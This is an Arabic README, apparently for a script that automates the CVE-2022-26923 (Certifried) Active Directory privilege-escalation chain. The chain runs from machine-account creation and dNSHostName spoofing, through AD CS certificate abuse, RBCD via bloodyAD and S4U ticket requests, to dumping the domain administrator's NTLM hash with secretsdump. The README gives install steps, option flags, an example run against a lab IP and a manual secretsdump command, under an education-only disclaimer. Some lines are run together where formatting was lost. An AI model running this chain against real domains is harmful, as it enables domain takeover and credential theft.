
استغلال CVE-2022-26923
أتمتة استغلال CVE-2022-26923 (Certifried) مما يسمح برفع الامتيازات عبر إساءة استخدام خدمات شهادات Active Directory (AD CS) وتفويض مقيد قائم على الموارد (RBCD)، مما يؤدي إلى تفريغ تجزئة NTLM لحساب مسؤول نطاق.
⚠️ للاستخدام التعليمي فقط / مختبر / HTB
لا تستخدم في بيئة غير مصرح بها.
يقوم هذا السكريبت بأتمتة سلسلة الهجوم التالية:
dNSHostNameadministratorsecretsdump.pycertipy-adbloodyADgetST.py (Impacket)secretsdump.py (Impacket)opensslpipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [خيارات]
-d, --dc-ip عنوان IP لوحدة تحكم النطاق
-D, --domain اسم النطاق
-u, --user مستخدم صالح
-p, --pass كلمة مرور المستخدم
-c, --comp-name اسم الجهاز المسيطر عليه
-C, --comp-pass كلمة مرور الجهاز
-a, --ca-name اسم هيئة الشهادات
-t, --template قالب الشهادة
-f, --pfx-file اسم ملف PFX
-H, --dc-hostname اسم مضيف وحدة تحكم النطاق
-A, --dc-account حساب وحدة تحكم النطاق
-i, --impersonate الحساب الهدف للانتحال
--verbose وضع التصحيح
-h, --help المساعدة
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u [email protected] \
-p 'Ch4ng3m3!' \
--verbose
في نهاية التنفيذ:
administrator.ccacheadministratorفي حالة وجود مشكلة مع Kerberos:
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/[email protected] \
-k -no-pass -dc-ip 10.129.1.39
إنشاء حساب جهاز
↓
تزوير dNSHostName
↓
طلب شهادة (قالب الجهاز)
↓
المصادقة عبر PFX
↓
إساءة استخدام RBCD (bloodyAD)
↓
S4U2Self + S4U2Proxy
↓
استخراج تذكرة Kerberos
↓
تفريغ NTLM عبر secretsdump
تم تقديم هذا المشروع لأغراض:
يتخلى المؤلف عن أي مسؤولية في حالة الاستخدام غير المصرح به.
MIT